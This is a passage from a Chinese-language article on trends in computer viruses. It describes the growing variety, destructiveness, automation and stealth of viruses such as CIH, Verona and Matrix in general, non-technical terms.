隨著計算機技術的發展和軟體的多樣性，病毒的種類也呈現多樣化發展的態勢，病毒不僅僅有引導型病毒、普通可執行文件型病毒、宏病毒、混合型病毒，還出現專門感染特定文件的高級病毒。特別是Java、VB和ActiveX的網頁技術逐漸被廣泛使用後，一些人就利用技術來撰寫病毒。以Java病毒為例，雖然它並不能破壞硬碟上的資料，但如果使用瀏覽器來瀏覽含有Java病毒的網頁，瀏覽器就把這些程序抓下來，然後用使用者自己系統里的資源去執行，因而，使用者就在神不知鬼不覺的狀態下，被病毒進入自己的機器進行復制並通過網路竊取寶貴的個人秘密信息。

3、破壞性更強

新病毒的破壞力更強，手段比過去更加狠毒和陰險，它可以修改文件（包括注冊表）、通訊埠，修改用戶密碼，擠占內存，還可以利用惡意程序實現遠程式控制制等。例如，CIH病毒破壞主板上的BIOS和硬碟數據，使得用戶需要更換主板，由於硬碟數據的不可恢復性丟失，給全世界用戶帶來巨大損失。又如，「白雪公主」病毒修改Wsock32.Dll，截取外發的信息，自動附加在受感染的郵件上，一旦收信人執行附件程序，該病毒就會感染個人主機。一旦計算機被病毒感染，其內部的所有數據、信息以及核心機密都將在病毒製造者面前暴露，他可以隨心所欲地控制所有受感染的計算機來達到自己的任何目的。

4、智能化

過去，人們的觀點是「只要不打開電子郵件的附件，就不會感染病毒」。但是，新一代計算機病毒卻令人震驚，例如，大名鼎鼎的「維羅納（Verona）」病毒是一個真正意義上的「超級病毒」，它不僅主題眾多，而且集郵件病毒的幾大特點為一身，令人無法設防。最嚴重的是它將病毒寫入郵件原文。這正是「維羅納」病毒的新突破，一旦用戶收到了該病毒郵件，無論是無意間用Outlook打開了該郵件，還是僅僅使用了預覽，病毒就會自動發作，並將一個新的病毒郵件發送給郵件通訊錄中的地址，從而迅速傳播。這就使得一旦「維羅納」類的病毒來臨，用戶將根本無法逃避。 該病毒本身對用戶計算機系統並不造成嚴重危害，但是這一病毒的出現已經是病毒技術的一次巨大「飛躍」，它無疑為今後更大規模、更大危害的病毒的出現做了一次技術上的試驗及預演，一旦這一技術與以往危害甚大的病毒技術或惡意程序、特洛伊木馬等相結合，它可能造成的危害將是無法想像的。

5、更加隱蔽化

和過去的病毒不一樣，新一代病毒更加隱蔽，主題會隨用戶傳播而改變，而且許多病毒還會將自己裝成常用的程序，或者將病毒代碼寫入文件內部，而文件長度不發生任何改變，使用戶不會產生懷疑。例如，猖狂一時的「歡樂99」病毒本身雖是附件，卻呈現為卡通的樣子迷惑用戶。現在，新的病毒可以將自身寫入Jpg等圖片中，計算機用戶一旦打開圖片，它就會運行某些程序將用戶電腦的硬碟格式化，以後無法恢復。還有象「矩陣(matrix)」等病毒會自動隱藏、變形，甚至阻止受害用戶訪問反病毒網站和向病毒記錄的反病毒地址發送電子郵件，無法下載經過更新、升級後的相應殺毒軟體或發布病毒警告消息。